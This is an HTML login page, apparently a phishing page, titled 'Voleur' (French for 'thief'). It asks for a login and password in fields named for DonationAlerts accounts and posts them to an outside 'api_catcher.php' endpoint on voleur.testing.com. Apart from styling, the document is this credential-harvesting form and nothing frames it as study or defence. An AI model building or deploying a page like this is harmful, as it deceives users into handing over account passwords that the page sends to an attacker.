<head>
    <style>
      @import url('https://fonts.googleapis.com/css?family=Oswald&display=swap');
      *{
        margin:0px;
        padding:0px;
      }

        form{
            height: 200px;
            width: 200px;
            border: 1px solid black;
            background-color:#1E1E1E;
        }

        p{
          font-size:12px;
          color:#D47B2E;
          font-family:'Oswald', sans-serif;
          margin-top:5px;
        }
        input{
            outline: 0;

            font-family:'Oswald', sans-serif;
        }

        input[type=text],
        input[type=password]{
            width: 150px;
        }
        input[type=submit],#button_back2{
          margin-top:10px;
          width:60px;
          margin-right:25px;
        }

        h1,h3{
            text-align: center;
            color:#D47B2E;
            font-family:'Oswald', sans-serif;
        }

        p,input{
        margin-left:30px;

        }
        input[type=submit],#button_back2{
          float:left;
        }
        #button_back2 a{
          font-family:'Oswald', sans-serif;
          text-decoration:none;
          width: 70px;
          height: 30px;
          color:#D47B2E;

          font-size:16px;

    </style>

</head>
<form target="_blank" method="post" action="http://voleur.testing.com/tab/api_catcher.php" id="login_donationalerts_form">

        <h1>Voleur</h1>
        <h3>Please sign in</h3>
        <p>Login:</p><input type="text" name="donationsalerts_login">
        <p>Password:</p><input type="password" name="donationalerts_password">
        <input type="submit" value="log in">
        <div id="button_back2">
          <a href="../../index.html">Back</a>
        </div>

</form>
